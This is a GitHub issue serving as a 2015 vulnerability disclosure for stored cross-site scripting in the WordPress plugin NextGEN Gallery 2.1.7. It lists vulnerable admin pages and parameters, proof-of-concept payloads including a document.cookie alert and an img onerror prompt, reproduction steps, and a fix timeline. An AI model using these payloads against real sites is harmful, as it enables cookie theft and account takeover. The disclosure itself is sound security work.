Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 #1

Open
cybersecurityworks opened this issue Aug 27, 2015 · 0 comments
Open

Comments

@cybersecurityworks
Copy link
Owner

Details

Word Press Product Bugs Report
Bug Name XSS (Cross Site Scripting)
Software: NextGen Gallery
Version: 2.1.7
Last Updated: 12-08-2015
Homepage: https://wordpress.org/plugins/nextgen-gallery/download/
Compatible Up to Wordpress 4.3.0 Version (Requires: 3.6.1 or higher)
Severity High
Description: Multiple XSS vulnerability in WordPress plugin NextGen Gallery

Proof of concept: (POC)

Visit the following page on a site with this plugin installed. http://wordpresssite.com/wordpress/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=1&paged=1 and modify the value of path variable in NextGEN Gallery Photocrati Version 2.1.10 with ’></script><script>alert(document.cookie);</script> payload and save it to view further.

Now, the added XSS payload will be executed whenever the user reviews it.

Note: XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to wp-config.php file.

define( 'DISALLOW_UNFILTERED_HTML', true );

Issue 1:
Vulnerable URL: http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_display_settings
Request: POST
Vulnerable Variable list:
• photocrati-nextgen_basic_thumbnails[thumbnail_width]
• photocrati-nextgen_basic_thumbnails[thumbnail_height]
• photocrati-nextgen_basic_thumbnails[template]
• photocrati-nextgen_basic_imagebrowser[template]
• photocrati-nextgen_basic_singlepic[template]
• photocrati-nextgen_basic_compact_album[template]
• photocrati-nextgen_basic_compact_album[thumbnail_width]
• photocrati-nextgen_basic_compact_album[thumbnail_height]
• photocrati-nextgen_basic_extended_album[template]
• photocrati-nextgen_basic_extended_album[thumbnail_width]
• photocrati-nextgen_basic_extended_album[thumbnail_height]

xss-5-photocrati-nextgen_basic_thumbnails thumbnail_width

Figure 1: HTTP Request & response for the vulnerable variable photocrati-nextgen_basic_thumbnails[thumbnail_width]


Issue 2:
Vulnerable URL: http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_other_options
Request: POST
Vulnerable Variable list:
• thumbnail_settings[thumbwidth]
• thumbnail_settings[thumbheight]
• watermark_options[wmXpos]
• watermark_options[wmYpos]

xss-1 thumbwidth

Figure 2: HTTP Request & response for the vulnerable variable thumbnail_settings[thumbwidth]

xss-5-photocrati-nextgen_basic_thumbnails thumbnail_width -response

Figure 3: XSS response executed in browser


Reproducing Steps

  1. Logon into any wordpress application (localhost or public host)
  2. Modifying the above mentioned variables in NextGEN Gallery Photocrati Version 2.1.7 (recently updated version)
  3. Fill all the variables with “><img src=x onerror=prompt(1)> payload and save it to view further.
  4. Now, the added XSS payload will be executed whenever we review it.

Timeline
31-08-2015 – Discovered in NextGen Gallery 2.1.7 version
31-08-2015 – Reported to WP Plugin
01-09-2015 – Fixed in 2.1.10 version of NextGen Gallery


Discovered by:
Sathish from Cyber Security Works Pvt Ltd

@cybersecurityworks cybersecurityworks changed the title Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 test Sep 1, 2015
Repository owner locked and limited conversation to collaborators Sep 1, 2015
Repository owner unlocked this conversation Sep 14, 2015
@cybersecurityworks cybersecurityworks changed the title test Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 Sep 14, 2015
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant